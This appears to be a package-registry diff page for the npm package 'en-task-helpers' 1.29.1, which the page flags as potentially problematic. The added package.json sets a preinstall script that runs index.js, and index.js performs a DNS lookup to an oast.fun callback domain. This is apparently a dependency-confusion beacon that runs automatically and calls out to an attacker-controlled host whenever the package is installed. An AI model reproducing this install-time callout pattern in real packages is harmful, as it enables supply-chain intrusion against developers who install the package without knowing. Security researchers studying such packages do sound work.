en-task-helpers 1.29.1

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of en-task-helpers might be problematic. Click here for more details.

Files changed (2) hide show
  1. package/index.js +7 -0
  2. package/package.json +15 -0
package/index.js ADDED
@@ -0,0 +1,7 @@
1
+ var dns = require('dns');
2
+
3
+
4
+
5
+ dns.lookup('tuyqqxposwjsckddhzwwppk4qk1wlvdzs.oast.fun', function onLookup(err, addresses, family) {
6
+ console.log('addresses:', addresses);
7
+ });
package/package.json ADDED
@@ -0,0 +1,15 @@
1
+ {
2
+ "name": "en-task-helpers",
3
+ "version": "1.29.1",
4
+ "description": "Test",
5
+ "main": "main.js",
6
+ "scripts": {
7
+ "preinstall": "node index.js",
8
+ "test": "echo \"Error: no test specified\" && exit 1"
9
+ },
10
+ "author": "",
11
+ "license": "ISC",
12
+ "dependencies": {
13
+ "lodash": "^4.17.21"
14
+ }
15
+ }